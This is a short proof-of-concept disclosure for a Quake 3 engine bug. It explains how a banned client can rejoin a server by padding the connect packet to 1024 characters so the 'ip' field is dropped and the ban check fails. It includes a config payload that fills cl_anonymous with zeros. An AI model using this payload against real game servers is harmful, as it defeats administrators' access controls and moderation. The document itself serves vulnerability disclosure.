// Banned clients can join the servers which use the Quake 3 engine 0.1 // bug originally found by Richard Stanway in Feb 2007 (rev 1043) but // unfortunately the ioquake3 executables are not updated and no // advisory was released so I casually "re-found" the same bug some // days ago // by Luigi Auriemma // e-mail: aluigi@autistici.org // web: aluigi.org // // the clients which use the Quake 3 engine and have been banned by the // server can still join simply using a connect packet of 1024 // (MAX_INFO_STRING) chars. // // The problem happens since the SV_DirectConnect can't add other stuff to // the client's data over MAX_INFO_STRING bytes and so when ClientConnect // checks if "ip" is banned it fails because there is no "ip" field in the // string or it's partial. // // NOTE that this proof-of-concept is not ready to work, you must tune the // number of chars here or just find another better cvar to modify or just // give up if the latest cvars of the "connect" command cannot be modified. // q3tms and q3huffdecenc can be useful during the tests // // Execute: /exec q3unban set cl_anonymous 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 //setu unban 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000